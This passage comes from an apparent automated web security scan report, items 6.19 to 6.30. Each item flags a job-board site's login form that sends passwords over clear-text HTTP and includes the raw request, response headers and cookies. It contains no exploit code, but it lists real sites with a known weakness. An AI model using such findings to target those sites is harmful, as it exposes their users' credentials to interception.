Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.businessdevelopmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.19. http://www.callcentercrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.callcentercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.callcentercrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=prr05v672vhpd9l46bt5lu88r3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128551

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.callcentercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.20. http://www.chefcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.chefcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.chefcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ha4et9frtsniged97g2n86qvf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108888

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.chefcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.21. http://www.civilengineeringcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.civilengineeringcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.civilengineeringcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=soga8db6spril7hls6mrahaid5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106801

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.civilengineeringcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.22. http://www.clevelcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.clevelcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.clevelcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7grpnh4ane7h6vq7m94a09osd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115509

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.clevelcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.23. http://www.clinicalresearchcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.clinicalresearchcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.clinicalresearchcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pot86ho5ls3u8ap2dd0c7javd7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.clinicalresearchcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.24. http://www.compliancecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.compliancecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.compliancecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t20irb9usa5ru4jlcuufdl43b5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.compliancecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.25. http://www.computeraideddesigncrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.computeraideddesigncrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.computeraideddesigncrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i4i09jl3sjo0digpp5qe6oqa75; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121001

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.computeraideddesigncrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.26. http://www.constructioncrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.constructioncrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.constructioncrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6c5ho2kr4aaj7if0r37e83a520; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131637

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.constructioncrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.27. http://www.consultingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.consultingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.consultingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cd981ht9vh5kim10q4v8a0ih67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111912

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.consultingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.28. http://www.contractmanagementcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.contractmanagementcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.contractmanagementcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fsi5mhj5680mc16iu88s1m9v73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111832

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.contractmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.29. http://www.counselingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.counselingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.counselingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lgk9crdg1goruniholj5urn963; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149300

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.counselingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.30. http://www.cpluspluscrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cpluspluscrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.cpluspluscrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
